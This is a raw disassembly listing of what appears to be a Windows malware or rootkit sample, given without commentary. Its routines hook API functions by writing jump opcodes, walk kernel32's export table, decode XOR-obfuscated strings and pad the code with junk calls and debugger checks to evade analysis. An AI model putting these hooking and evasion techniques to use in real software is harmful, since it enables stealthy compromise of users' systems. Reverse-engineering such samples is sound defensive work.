cmp eax, 0E8h
jz short loc_402783
cmp eax, 0E9h
jnz short loc_4027C9
loc_402783: ; CODE XREF: sub_402563+217�j
call sub_40C794 ; GetProcessHeap
mov eax, [ebp+arg_4]
or edx, 0FFFFFFFFh
mov ecx, [ebp+arg_8]
lea ecx, [eax+ecx+5]
add ecx, ebx
sub ecx, 4
sub edx, ecx
add edx, eax
mov eax, edx
sub eax, 4
mov [ebp+var_C], eax
call sub_40C7C4 ; GetTickCount
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp+var_C]
mov ds:1[eax], edx
call sub_40C734 ; GetCurrentProcessId
loc_4027C9: ; CODE XREF: sub_402563+1E8�j
; sub_402563+1F1�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 1
jnz short loc_402831
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 1
jnz short loc_402831
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 1
jnz short loc_402831
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 1
jnz short loc_402831
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp al, 3Dh
jz short loc_40280C
cmp eax, 0FEh
jz short loc_40280C
cmp eax, 0FFh
jnz short loc_402831
loc_40280C: ; CODE XREF: sub_402563+299�j
; sub_402563+2A0�j
call sub_40C794 ; GetProcessHeap
call sub_40C734 ; GetCurrentProcessId
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_8]
lea edi, [edi+esi+5]
add edi, ebx
sub edi, 4
mov ds:1[edi], eax
call sub_40C740 ; GetCurrentThreadId
loc_402831: ; CODE XREF: sub_402563+26D�j
; sub_402563+276�j ...
inc ebx
cmp ebx, 400h
jb loc_40257E
loc_40283E: ; CODE XREF: sub_402563+60�j
pop edi
pop esi
pop ebx
leave
retn
sub_402563 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402843 proc near ; CODE XREF: sub_403010+237�p
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_22 = byte ptr -22h
var_1F = byte ptr -1Fh
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov [ebp+var_11], 0A2h
sub [ebp+var_11], 8
call sub_40C854 ; IsDebuggerPresent
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_4028A8
; ---------------------------------------------------------------------------
loc_402861: ; CODE XREF: sub_402843+70�j
call sub_40C7C4 ; GetTickCount
xor ebx, ebx
jmp short loc_402874
; ---------------------------------------------------------------------------
loc_40286A: ; CODE XREF: sub_402843+37�j
mov eax, [ebp+var_4]
cmp byte ptr [eax+ebx], 0
jnz short loc_40287C
inc ebx
loc_402874: ; CODE XREF: sub_402843+25�j
cmp ebx, 3E8h
jbe short loc_40286A
loc_40287C: ; CODE XREF: sub_402843+2E�j
lea edi, [ebp+var_26]
lea esi, a5anwhv ; "5Nwhv"
mov ecx, 7
rep movsb
cmp ebx, 3E8h
jnb short loc_4028BA
mov [ebp+var_1F], 0B8h
movzx eax, [ebp+var_1F]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1F], al
inc [ebp+var_4]
loc_4028A8: ; CODE XREF: sub_402843+1C�j
mov eax, [ebp+arg_4]
sub eax, 3E8h
cmp [ebp+var_4], eax
jbe short loc_402861
jmp loc_402A43
; ---------------------------------------------------------------------------
loc_4028BA: ; CODE XREF: sub_402843+4F�j
add [ebp+var_4], 0Ah
movzx edi, [ebp+arg_8]
shl edi, 2
mov ebx, ds:dword_40F2E0[edi]
and [ebp+var_8], 0
loc_4028D0: ; CODE XREF: sub_402843+162�j
mov eax, ebx
add eax, [ebp+var_8]
push eax
call sub_401D31
pop ecx
call sub_40C794 ; GetProcessHeap
mov eax, [ebp+var_8]
movzx eax, byte ptr [ebx+eax]
cmp eax, 0E8h
jz short loc_40291F
cmp eax, 0E9h
jz short loc_40291F
call sub_40C794 ; GetProcessHeap
and [ebp+var_C], 0
jmp short loc_402913
; ---------------------------------------------------------------------------
loc_402901: ; CODE XREF: sub_402843+D8�j
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov cl, [ebx+eax]
mov [edx+eax], cl
inc [ebp+var_C]
loc_402913: ; CODE XREF: sub_402843+BC�j
mov eax, ds:dword_40E07C
cmp [ebp+var_C], eax
jb short loc_402901
jmp short loc_402999
; ---------------------------------------------------------------------------
loc_40291F: ; CODE XREF: sub_402843+AA�j
; sub_402843+B1�j
lea edi, [ebp+var_22]
lea esi, aZ ; "z "
mov ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
mov cl, [ebx+eax]
mov [edx+eax], cl
call sub_40C854 ; IsDebuggerPresent
mov eax, [ebp+var_8]
lea eax, [ebx+eax+1]
mov eax, [eax]
mov [ebp+var_10], eax
mov [ebp+var_1F], 65h
movzx eax, [ebp+var_1F]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1F], al
mov eax, [ebp+var_8]
mov edx, [ebp+var_10]
mov ecx, [ebp+var_4]
add ecx, eax
sub edx, ecx
mov ecx, ebx
add ecx, eax
mov eax, edx
add eax, ecx
mov [ebp+var_1C], eax
lea edi, [ebp+var_27]
lea esi, aNiL ; "NI*l"
mov ecx, 5
rep movsb
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
lea eax, [eax+edx+1]
mov edx, [ebp+var_1C]
mov [eax], edx
call sub_40C740 ; GetCurrentThreadId
loc_402999: ; CODE XREF: sub_402843+DA�j
mov eax, ds:dword_40E07C
add [ebp+var_8], eax
cmp [ebp+var_8], 5
jb loc_4028D0
mov [ebp+var_18], 60F2h
sub [ebp+var_18], 502Ah
mov eax, [ebp+var_8]
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_4]
add ecx, eax
sub edx, ecx
mov ecx, ebx
add ecx, eax
mov eax, edx
add eax, ecx
sub eax, 4
mov [ebp+var_10], eax
mov ax, word_43D11B
mov [ebp+var_1E], ax
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
mov byte ptr [edx+eax], 0E9h
call sub_40C734 ; GetCurrentProcessId
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
lea eax, [eax+edx+1]
mov edx, [ebp+var_10]
mov [eax], edx
call sub_40C734 ; GetCurrentProcessId
or eax, 0FFFFFFFFh
sub eax, ebx
mov edx, [ebp+var_4]
mov ecx, [ebp+var_8]
lea edx, [edx+ecx+5]
add eax, edx
sub eax, 4
mov [ebp+var_10], eax
mov byte ptr [ebx], 0E9h
mov ds:1[ebx], eax
call sub_40C7C4 ; GetTickCount
push [ebp+var_8]
push [ebp+var_4]
movzx edi, [ebp+arg_8]
shl edi, 4
push off_43CE84[edi]
call sub_402563
add esp, 0Ch
loc_402A43: ; CODE XREF: sub_402843+72�j
pop edi
pop esi
pop ebx
leave
retn
sub_402843 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A48 proc near ; CODE XREF: sub_40AA24+5B8�p
var_21B8 = dword ptr -21B8h
var_21B4 = dword ptr -21B4h
var_21B0 = dword ptr -21B0h
var_21AC = dword ptr -21ACh
var_21A8 = dword ptr -21A8h
var_21A4 = dword ptr -21A4h
var_21A0 = dword ptr -21A0h
var_219B = byte ptr -219Bh
var_2198 = dword ptr -2198h
var_2193 = dword ptr -2193h
var_218C = dword ptr -218Ch
var_2188 = dword ptr -2188h
var_2182 = word ptr -2182h
var_2180 = dword ptr -2180h
var_207B = byte ptr -207Bh
var_2074 = dword ptr -2074h
var_2070 = byte ptr -2070h
var_2068 = byte ptr -2068h
var_2060 = dword ptr -2060h
var_2050 = dword ptr -2050h
var_204C = dword ptr -204Ch
var_2044 = dword ptr -2044h
var_2034 = dword ptr -2034h
var_2030 = dword ptr -2030h
var_202C = dword ptr -202Ch
var_2026 = byte ptr -2026h
var_2025 = byte ptr -2025h
var_2020 = dword ptr -2020h
var_101C = dword ptr -101Ch
var_1015 = byte ptr -1015h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 258Ch
call sub_40C6B8
push ebx
push esi
push edi
call sub_40C7C4 ; GetTickCount
call sub_402226
call sub_40C764 ; RtlGetLastWin32Error
mov [ebp+var_2025], 0
call sub_40C7D0 ; GetVersion
cmp eax, 80000000h
jnb short loc_402A81
mov [ebp+var_2025], 1
loc_402A81: ; CODE XREF: sub_402A48+30�j
lea edi, [ebp-2067h]
lea esi, byte_43D11D
mov ecx, 3
rep movsb
mov [ebp+var_1015], 0
loc_402A9B: ; CODE XREF: sub_402A48+F5�j
cmp [ebp+var_2025], 0
jnz short loc_402AB8
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43CE88[edi], 1
jz short loc_402AD5
loc_402AB8: ; CODE XREF: sub_402A48+5A�j
cmp [ebp+var_2025], 0
jz short loc_402AD7
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43CE88[edi], 2
jnz short loc_402AD7
loc_402AD5: ; CODE XREF: sub_402A48+6E�j
jmp short loc_402B24
; ---------------------------------------------------------------------------
loc_402AD7: ; CODE XREF: sub_402A48+77�j
; sub_402A48+8B�j
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push off_43CE80[esi]
call sub_40C860 ; LoadLibraryA
mov ds:dword_415180[edi*4], eax
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push off_43CE7C[esi]
shl edi, 2
push ds:dword_415180[edi]
call sub_40C788 ; GetProcAddress
mov ds:dword_40F2E0[edi], eax
call sub_40C7C4 ; GetTickCount
loc_402B24: ; CODE XREF: sub_402A48:loc_402AD5�j
add [ebp+var_1015], 1
movzx edi, [ebp+var_1015]
shl edi, 4
cmp off_43CE7C[edi], 0
jnz loc_402A9B
lea edi, [ebp-206Fh]
lea esi, aOGdu ; "O$/gdu "
movsd
movsd
mov [ebp+var_1015], 0
loc_402B58: ; CODE XREF: sub_403010+2C2�j
movzx edi, [ebp+var_1015]
shl edi, 2
cmp ds:dword_40F2E0[edi], 0
jz loc_4032B9
call sub_40C854 ; IsDebuggerPresent
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_415180[edi]
mov [ebp+var_2034], edi
cmp [ebp+var_2025], 0
jz loc_402E2B
mov [ebp+var_21A0], 51E2h
mov eax, 0D23h
mul [ebp+var_21A0]
mov [ebp+var_21A4], eax
mov [ebp+var_21A0], eax
call sub_4022BB
mov [ebp+var_2030], eax
shr edi, 16h
shl edi, 16h
mov [ebp+var_8], edi
call sub_40C740 ; GetCurrentThreadId
mov eax, edi
add eax, 400000h
mov [ebp+var_1014], eax
xor ebx, ebx
jmp short loc_402C3A
; ---------------------------------------------------------------------------
loc_402BE4: ; CODE XREF: sub_402A48+1FB�j
mov [ebp+var_21A8], 0EAEh
mov eax, 1AEBh
mul [ebp+var_21A8]
mov [ebp+var_21AC], eax
mov [ebp+var_21A8], eax
mov eax, dword_43CFF8
add eax, 0FEFh
push eax
push [ebp+var_8]
call sub_40C83C ; IsBadReadPtr
mov [ebp+var_4], eax
call sub_40C7C4 ; GetTickCount
xor [ebp+var_4], 1
shl [ebp+var_4], 2
mov edi, [ebp+var_4]
mov [ebp+ebx*4+var_1010], edi
inc ebx
add [ebp+var_8], 1000h
loc_402C3A: ; CODE XREF: sub_402A48+19A�j
mov eax, [ebp+var_1014]
cmp [ebp+var_8], eax
jbe short loc_402BE4
lea eax, [ebp+var_219B]
push eax
call sub_40C824 ; GlobalMemoryStatus
call sub_40C740 ; GetCurrentThreadId
and [ebp+var_101C], 0
jmp loc_402D77
; ---------------------------------------------------------------------------
loc_402C62: ; CODE XREF: sub_402A48+340�j
call sub_40C7D0 ; GetVersion
push 0FFFFh
push [ebp+var_101C]
push [ebp+var_2030]
call sub_402445
add esp, 0Ch
mov [ebp+var_C], eax
mov byte ptr [ebp+var_21AC+3], 12h
movzx eax, byte ptr [ebp+var_21AC+3]
imul eax, 0C31h
mov byte ptr [ebp+var_21AC+3], al
cmp [ebp+var_C], 0
jnz short loc_402CAD
call sub_40C740 ; GetCurrentThreadId
jmp loc_402D6D
; ---------------------------------------------------------------------------
loc_402CAD: ; CODE XREF: sub_402A48+259�j
and [ebp+var_21A8], 0
loc_402CB4: ; CODE XREF: sub_403010+2A4�j
mov eax, [ebp+var_21A8]
mov [ebp+var_8], eax
jmp loc_402D52
; ---------------------------------------------------------------------------
loc_402CC2: ; CODE XREF: sub_402A48+311�j
mov [ebp+var_21B0], 690h
add [ebp+var_21B0], 2151h
xor ebx, ebx
loc_402CD8: ; CODE XREF: sub_402A48+2DF�j
call sub_40C7C4 ; GetTickCount
mov edi, [ebp+var_8]
shr edi, 2
shl edi, 2
add edi, [ebp+var_C]
mov edi, [edi+ebx*4]
mov [ebp+var_4], edi
and [ebp+var_4], 4
mov edi, [ebp+ebx*4+var_1010]
cmp [ebp+var_4], edi
jnz short loc_402D29
mov [ebp+var_21B4], 6D86h
mov eax, 4E3Ch
mul [ebp+var_21B4]
mov [ebp+var_21B8], eax
mov [ebp+var_21B4], eax
inc ebx
cmp ebx, 400h
jb short loc_402CD8
loc_402D29: ; CODE XREF: sub_402A48+2B5�j
cmp ebx, 3FFh
jb short loc_402D4B
call sub_40C794 ; GetProcessHeap
mov eax, [ebp+var_8]
add eax, 1000h
mov [ebp+var_21A8], eax
call sub_40C734 ; GetCurrentProcessId
jmp short loc_402D9E
; ---------------------------------------------------------------------------
loc_402D4B: ; CODE XREF: sub_402A48+2E7�j
add [ebp+var_8], 1000h
loc_402D52: ; CODE XREF: sub_402A48+275�j
cmp [ebp+var_8], 0F000h
jbe loc_402CC2
push [ebp+var_C]
call sub_4024A8
pop ecx
call sub_40C740 ; GetCurrentThreadId
loc_402D6D: ; CODE XREF: sub_402A48+260�j
add [ebp+var_101C], 10000h
loc_402D77: ; CODE XREF: sub_402A48+215�j
mov eax, [ebp+var_2193]
sub eax, 0FFFFh
cmp [ebp+var_101C], eax
jbe loc_402C62
push [ebp+var_2030]
call sub_40C7AC ; CloseHandle
jmp loc_4032B9
; ---------------------------------------------------------------------------
loc_402D9E: ; CODE XREF: sub_402A48+301�j
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_40F2E0[edi]
mov [ebp+var_1014], edi
and [ebp+var_1014], 0
loc_402DBC: ; CODE XREF: sub_402A48+3E1�j
call sub_40C764 ; RtlGetLastWin32Error
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
mov esi, [esi+edi]
mov [ebp+edi+var_2020], esi
call sub_40C734 ; GetCurrentProcessId
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
add edi, esi
or byte ptr [edi], 2
mov byte ptr [ebp+var_21A8+3], 1Eh
movzx eax, byte ptr [ebp+var_21A8+3]
imul eax, 409Ah
mov byte ptr [ebp+var_21A8+3], al
inc [ebp+var_1014]
cmp [ebp+var_1014], 400h
jb short loc_402DBC
loc_402E2B: ; CODE XREF: sub_402A48+14B�j
cmp [ebp+var_2025], 0
jnz loc_402F0D
call sub_40C7D0 ; GetVersion
push offset aKernel32_dll ; "kernel32.dll"
call sub_40C77C ; GetModuleHandleA
mov [ebp+var_2180], eax
lea edi, [ebp+var_21A4+3]
lea esi, aE3 ; "-;E3"
mov ecx, 5
rep movsb
mov eax, [ebp+var_2180]
mov edx, eax
add edx, ds:3Ch[eax]
mov [ebp+var_2193+3], edx
mov [ebp+var_2182], 4195h
movzx eax, [ebp+var_2182]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2182], ax
mov eax, [ebp+var_2180]
mov edx, [ebp+var_2193+3]
add edx, 78h
add eax, [edx]
mov [ebp-2194h], eax
call sub_40C734 ; GetCurrentProcessId
mov eax, [ebp+var_2180]
mov edx, [ebp-2194h]
add edx, 1Ch
add eax, [edx]
mov [ebp+var_2198], eax
mov eax, [ebp+var_2180]
mov edx, [ebp+var_2198]
add eax, [edx]
mov [ebp-219Ch], eax
mov [ebp+var_218C], 0F88h
add [ebp+var_218C], 72CBh
mov [ebp+var_2074], eax
mov [ebp+var_2188], 200Bh
mov eax, [ebp+var_2188]
mov edx, eax
add edx, eax
mov [ebp+var_2188], edx
loc_402F0D: ; CODE XREF: sub_402A48+3EA�j
push 1Ch
lea eax, [ebp+var_2050]
push eax
call sub_40C8C0 ; RtlZeroMemory
mov eax, [ebp+var_2034]
mov [ebp+var_202C], eax
call sub_40C7D0 ; GetVersion
loc_402F2C: ; CODE XREF: sub_402A48+537�j
; sub_402A48+57E�j
push 1Ch
lea eax, [ebp+var_2050]
push eax
push [ebp+var_202C]
call sub_40C920 ; VirtualQuery
call sub_40C734 ; GetCurrentProcessId
mov eax, [ebp+var_2034]
cmp [ebp+var_204C], eax
jnz short loc_402FCB
lea edi, [ebp+var_207B]
lea esi, aZt_ ; "!/zt_$"
mov ecx, 7
rep movsb
mov eax, [ebp+var_2044]
mov [ebp+var_2060], eax
add [ebp+var_202C], eax
cmp [ebp+var_2025], 0
jnz short loc_402F2C
mov [ebp+var_2180], 691Fh
mov eax, [ebp+var_2180]
mov edx, eax
add edx, eax
mov [ebp+var_2180], edx
push 20060000h
push 0
mov edi, [ebp+var_2060]
shr edi, 0Ch
push edi
mov edi, [ebp+var_2050]
shr edi, 0Ch
push edi
push 1000Dh
call [ebp+var_2074]
call sub_40C740 ; GetCurrentThreadId
jmp loc_402F2C
; ---------------------------------------------------------------------------
loc_402FCB: ; CODE XREF: sub_402A48+509�j
movzx edi, [ebp+var_1015]
shl edi, 2
mov esi, [ebp+var_202C]
sub esi, [ebp+var_2034]
mov ds:dword_4118A0[edi], esi
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_40F2E0[edi]
mov [ebp+var_1014], edi
mov eax, dword_43CFF4 ; DATA XREF: .data:loc_4403D2�r
; sub_4403F5+8C�w ...
loc_403004: ; DATA XREF: .data:0043F42D�r
; .data:loc_43F469�r ...
add eax, 1000h
push eax
push edi
call sub_40C848 ; IsBadWritePtr
sub_402A48 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403010 proc near ; DATA XREF: .data:0043F529�o
; sub_4403F5+10�o
mov [ebp-2064h], eax
mov dword ptr [ebp-2058h], 78C1h
add dword ptr [ebp-2058h], 3550h
test eax, eax
jnz loc_403269
mov dword ptr [ebp-205Ch], 1FC2h
add dword ptr [ebp-205Ch], 61DDh
cmp byte ptr [ebp+8], 0
jz loc_403233
lea edi, [ebp-2183h]
lea esi, byte_43D134
xor ecx, ecx
inc ecx
rep movsb
mov eax, [ebp-1014h]
movzx eax, byte ptr [eax]
cmp eax, 0E9h
jz short loc_403085
call sub_40C764 ; RtlGetLastWin32Error
cmp byte ptr [ebp+8], 1
jz loc_403269
jmp loc_403233
; ---------------------------------------------------------------------------
loc_403085: ; CODE XREF: sub_403010+5F�j
mov eax, [ebp-1014h]
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp-2024h], eax
mov dword ptr [ebp-2180h], 14DFh
mov eax, 61CEh
mul dword ptr [ebp-2180h]
mov [ebp-2588h], eax
mov [ebp-2180h], eax
mov byte ptr [ebp-217Ch], 0
loc_4030C7: ; CODE XREF: sub_403010+154�j
sub dword ptr [ebp-2024h], 5
mov eax, [ebp-2024h]
mov [ebp-4], eax
loc_4030D7: ; CODE XREF: sub_403010+100�j
mov eax, [ebp-4]
mov edx, eax
dec edx
cmp byte ptr [edx], 0
jnz short loc_403108
mov edx, eax
sub edx, 2
cmp byte ptr [edx], 0
jnz short loc_403108
mov edx, eax
sub edx, 3
cmp byte ptr [edx], 0
jnz short loc_403108
mov edx, eax
sub edx, 4
cmp byte ptr [edx], 0
jnz short loc_403108
sub eax, 5
cmp byte ptr [eax], 0
jz short loc_403112
loc_403108: ; CODE XREF: sub_403010+D0�j
; sub_403010+DA�j ...
call sub_40C7D0 ; GetVersion
dec dword ptr [ebp-4]
jmp short loc_4030D7
; ---------------------------------------------------------------------------
loc_403112: ; CODE XREF: sub_403010+F6�j
movzx edi, byte ptr [ebp-217Ch]
shl edi, 2
mov esi, [ebp-4]
mov [ebp+edi-2580h], esi
add byte ptr [ebp-217Ch], 1
movzx eax, byte ptr [esi]
cmp eax, 0E9h
jnz short loc_403169
mov word ptr [ebp-258Ah], 7AC6h
add word ptr [ebp-258Ah], 2581h
mov eax, esi
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp-2024h], eax
call sub_40C734 ; GetCurrentProcessId
jmp loc_4030C7
; ---------------------------------------------------------------------------
loc_403169: ; CODE XREF: sub_403010+125�j
mov ebx, [ebp-4]
jmp short loc_4031A0
; ---------------------------------------------------------------------------
loc_40316E: ; CODE XREF: sub_403010+196�j
mov word ptr [ebp-258Ah], 135Dh
movzx eax, word ptr [ebp-258Ah]
imul eax, 5BAAh
mov [ebp-258Ah], ax
mov eax, [ebp-1014h]
add eax, ebx
sub eax, [ebp-4]
mov dl, [ebx]
mov [eax], dl
call sub_40C734 ; GetCurrentProcessId
inc ebx
loc_4031A0: ; CODE XREF: sub_403010+15C�j
cmp ebx, [ebp-2024h]
jb short loc_40316E
loc_4031A8: ; CODE XREF: sub_403010+208�j
sub byte ptr [ebp-217Ch], 1
movzx edi, byte ptr [ebp-217Ch]
shl edi, 2
mov ebx, [ebp+edi-2580h]
loc_4031C0: ; CODE XREF: sub_403010+1FD�j
mov byte ptr [ebx], 0
call sub_40C7C4 ; GetTickCount
cmp byte ptr ds:1[ebx], 0
jnz short loc_4031FA
cmp byte ptr ds:2[ebx], 0
jnz short loc_4031FA
cmp byte ptr ds:3[ebx], 0
jnz short loc_4031FA
cmp byte ptr ds:4[ebx], 0
jnz short loc_4031FA
cmp byte ptr ds:5[ebx], 0
jz short loc_40320F
loc_4031FA: ; CODE XREF: sub_403010+1C0�j
; sub_403010+1CA�j ...
mov word ptr [ebp-2182h], 7E10h
add word ptr [ebp-2182h], 504Ch
inc ebx
jmp short loc_4031C0
; ---------------------------------------------------------------------------
loc_40320F: ; CODE XREF: sub_403010+1E8�j
movzx eax, byte ptr [ebp-217Ch]
or eax, eax
jg short loc_4031A8
cmp byte ptr [ebp+8], 1
jz short loc_403269
lea edi, [ebp-2583h]
lea esi, aZ_0 ; " Z"
mov ecx, 3
rep movsb
loc_403233: ; CODE XREF: sub_403010+3A�j
; sub_403010+70�j
movzx eax, byte ptr [ebp-1015h]
push eax
push dword ptr [ebp-202Ch]
push dword ptr [ebp-2034h]
call sub_402843
add esp, 0Ch
mov byte ptr [ebp-2051h], 0C0h
movzx eax, byte ptr [ebp-2051h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-2051h], al
loc_403269: ; CODE XREF: sub_403010+1C�j
; sub_403010+6A�j ...
cmp byte ptr [ebp-2025h], 0
jz short loc_4032B9
call sub_40C764 ; RtlGetLastWin32Error
and dword ptr [ebp-1014h], 0
loc_40327E: ; CODE XREF: sub_403010+29D�j
mov edi, [ebp-1014h]
shl edi, 2
mov esi, [ebp-8]
shr esi, 2
shl esi, 2
add esi, [ebp-0Ch]
mov edx, [ebp+edi-2020h]
mov [esi+edi], edx
inc dword ptr [ebp-1014h]
cmp dword ptr [ebp-1014h], 400h
jb short loc_40327E
call sub_40C7D0 ; GetVersion
jmp loc_402CB4
; ---------------------------------------------------------------------------
loc_4032B9: ; CODE XREF: sub_402A48+122�j
; sub_402A48+351�j ...
add byte ptr [ebp-1015h], 1
movzx edi, byte ptr [ebp-1015h]
shl edi, 4
cmp off_43CE7C[edi], 0
jnz loc_402B58
call sub_40C740 ; GetCurrentThreadId
pop edi
pop esi
pop ebx
leave
retn
sub_403010 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4032E2 proc near ; CODE XREF: sub_40341E+37�p
; sub_40349A+44�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43D140
lea eax, ds:41D8B0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
xor edi, edi
jmp short loc_403322
; ---------------------------------------------------------------------------
loc_403308: ; CODE XREF: sub_4032E2+42�j
mov eax, dword_43D140
add eax, edi
lea eax, ds:41D8B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0AFh
mov [eax], dl
inc edi
loc_403322: ; CODE XREF: sub_4032E2+24�j
cmp edi, esi
jl short loc_403308
mov eax, dword_43D140
add eax, esi
mov byte ptr ds:dword_41D8B0[eax], 0
mov edi, dword_43D140
add dword_43D140, 3
mov eax, dword_43D140
add eax, 5
add eax, esi
mov dword_43D140, eax
cmp eax, 0DC9h
jle short loc_40335F
and dword_43D140, 0
loc_40335F: ; CODE XREF: sub_4032E2+74�j
mov [ebp+var_4], 116h
lea eax, dword_41D8B0[edi]
pop edi
pop esi
leave
retn
sub_4032E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403370 proc near ; CODE XREF: sub_40341E+19�p
; sub_40349A+33�p
var_F = byte ptr -0Fh
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C7D0 ; GetVersion
call sub_40C7C4 ; GetTickCount
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_40338B: ; CODE XREF: sub_403370+20�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40338B
mov edi, eax
mov [ebp+var_6], di
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_4033C6
; ---------------------------------------------------------------------------
loc_4033A2: ; CODE XREF: sub_403370+5C�j
movzx eax, [ebp+var_2]
cmp byte ptr [ebx+eax], 5Ch
jnz short loc_4033C2
call sub_40C854 ; IsDebuggerPresent
inc [ebp+var_2]
lea edi, [ebp+var_F]
lea esi, aObxzqn@ ; "oxzqn@"
movsd
movsd
jmp short loc_4033CE
; ---------------------------------------------------------------------------
loc_4033C2: ; CODE XREF: sub_403370+3A�j
dec [ebp+var_2]
loc_4033C6: ; CODE XREF: sub_403370+30�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_4033A2
loc_4033CE: ; CODE XREF: sub_403370+50�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_40340B
mov [ebp+var_4], 0
jmp short loc_4033F9
; ---------------------------------------------------------------------------
loc_4033E0: ; CODE XREF: sub_403370+99�j
movzx eax, [ebp+var_4]
mov edx, [ebp+arg_4]
movzx ecx, [ebp+var_2]
mov esi, eax
add esi, ecx
mov cl, [ebx+esi]
mov [edx+eax], cl
inc [ebp+var_4]
loc_4033F9: ; CODE XREF: sub_403370+6E�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_4033E0
loc_40340B: ; CODE XREF: sub_403370+66�j
lea edi, [ebp+var_7]
lea esi, byte_43D14C
xor ecx, ecx
inc ecx
rep movsb
pop edi
pop esi
pop ebx
leave
retn
sub_403370 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40341E proc near ; CODE XREF: sub_403A5F+7D�p
; sub_403BE7+24E�p ...
var_10A = word ptr -10Ah
var_108 = word ptr -108h
var_106 = byte ptr -106h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
call sub_40C734 ; GetCurrentProcessId
lea eax, [ebp+var_106]
push eax
push [ebp+arg_0]
call sub_403370
mov [ebp+var_108], 1417h
add [ebp+var_108], 7A22h
push 2
push offset aXs ; ""
call sub_4032E2
push eax
lea edi, [ebp+var_106]
push edi
call sub_40CC74
add esp, 18h
mov [ebp+var_2], 4444h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
lea eax, [ebp+var_106]
push eax
call sub_40C800 ; GlobalAddAtomA
mov ax, word_43D14D
mov [ebp+var_10A], ax
pop edi
leave
retn
sub_40341E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40349A proc near ; CODE XREF: sub_4098A8+2D8�p
; sub_4098A8+388�p ...
var_112 = byte ptr -112h
var_10C = dword ptr -10Ch
var_108 = word ptr -108h
var_106 = word ptr -106h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 114h
push ebx
push esi
push edi
mov ax, word_43D14F
mov [ebp+var_108], ax
mov eax, dword_43D151
mov [ebp+var_10C], eax
call sub_40C740 ; GetCurrentThreadId
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call sub_403370
call sub_40C7C4 ; GetTickCount
push 2
push offset aXs ; ""
call sub_4032E2
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CC74
add esp, 18h
call sub_40C764 ; RtlGetLastWin32Error
